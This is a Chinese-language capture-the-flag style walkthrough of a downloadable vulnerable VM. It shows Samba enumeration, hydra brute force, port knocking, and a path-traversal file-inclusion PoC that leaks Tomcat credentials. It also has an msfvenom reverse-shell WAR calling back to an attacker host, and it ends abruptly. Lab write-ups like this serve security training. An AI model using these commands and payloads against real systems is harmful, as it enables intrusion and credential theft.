仅供个人娱乐

靶机信息

下载地址:https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download

一、主机探测

二、信息收集

22/tcp filtered ssh

53/tcpopendomain

80/tcp filtered http

110/tcpopenpop3?

139/tcpopennetbios-ssn Samba smbd3.X-4.X(workgroup:WORKGROUP)

143/tcpopenimap Dovecot imapd

445/tcpopennetbios-ssn Samba smbd4.3.11-Ubuntu(workgroup:WORKGROUP)

993/tcpopenssl/imap Dovecot imapd995/tcpopenssl/pop3s?

8080/tcpopenhttp Apache Tomcat/Coyote JSP engine1.1

8080tomcat页面,/manager/登录不了

三、漏洞查找和利用

1.Samba漏洞攻击

Samba服务查看用户名.

enum4linux -U 192.168.174.130

用户名为:qiu 或者 pleadformercy

尝试远程挂载

mkdir /mnt/file

mount  -tcifs 192.168.174.130:/qiu  /mnt/file

hydra -L 1.txt -P 2.txt smb://192.168.174.130 -s 139

登录账户信息
smbclient //192.168.174.130/qiu -U qiu

端口启动守护进程的防火墙端口开放的命令配置.

#!/bin/bash

for PORT in 159 27391 4;do nmap -Pn 192.168.174.130 -p $PORT;

done

#!/bin/bash

for PORT in 17301 28504 9999;do nmap -Pn 192.168.174.130 -p $PORT;

done

打开80端口

其PoC为:

http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/passwd

8080端口中 ,apache的配置信息在/etc/tomcat7/tomcat-users.xml

http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml

获取账户密码

<?
<user username="thisisasuperduperlonguser"
password="heartbreakisinevitable"
roles="admin-gui,manager-gui"/><? <user username="fluffy"
password="freakishfluffybunny" roles="none"/>

msfvenom来生成反弹war包

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f war -o shell1.war

通过7z命令查看war包的内容

7z l shell1.war

生成的是wviikccgyjggh.jsp

访问http://192.168.174.130:8080/shell1/wviikccgyjggh.jsp

python -c 'import pty;pty.spawn("/bin/bash")'

信息收集

切换账户登录

<? <user username="fluffy" password="freakishfluffybunny" roles="none"/>



最新文章

  1. python之ATM
  2. LaTeX用dvi编译,Yap浏览器弹出对话框,决解办法(傻瓜教程)
  3. CSS网页布局全精通
  4. 【JavaScript】放大镜效果
  5. Android 中类似ModelWindow的一个实现
  6. HDU 3068 [最长回文子串]
  7. 生成并返回 json 结果文件
  8. asp.net web 开发登录相关操作的控件LoginName、LoginStatus和LoginView控件使用详解
  9. Visual Studio的广告剧
  10. leetcode 第43题 Wildcard Matching
  11. Mac下安装BeautifulSoup
  12. 关于使用lombok遇到的问题
  13. hi3531串口波特率计算
  14. P1563 玩具谜题(简单模拟)
  15. Unity Chan 2D Asset
  16. ASP.NET MVC:4 Ways To Prevent Duplicate Form Submission(转载)
  17. wireshark抓取OMCI报文
  18. 强大工具psexec工具用法简介
  19. Java中的Class.forName
  20. JS里点击事件判断是否 触发了节点 和给标签添加class属性

热门文章

  1. Linux命令(磁盘的卸载与挂载)
  2. Vsftpd虚拟用户登陆配置(Centos7)
  3. Vue 消除Token过期时刷新页面的重复提示
  4. 腾讯互动白板+即时通讯+实时音视频,Android学生端接入
  5. SpringBoot:Service层使用@Autowired 注解 mapper对象爆红问题
  6. inux下查看最消耗CPU、内存的进程
  7. doc系统maven打包脚本
  8. CG-CTF WxyVM2
  9. Android单元测试问题解决
  10. windows服务器下MySQL配置字符集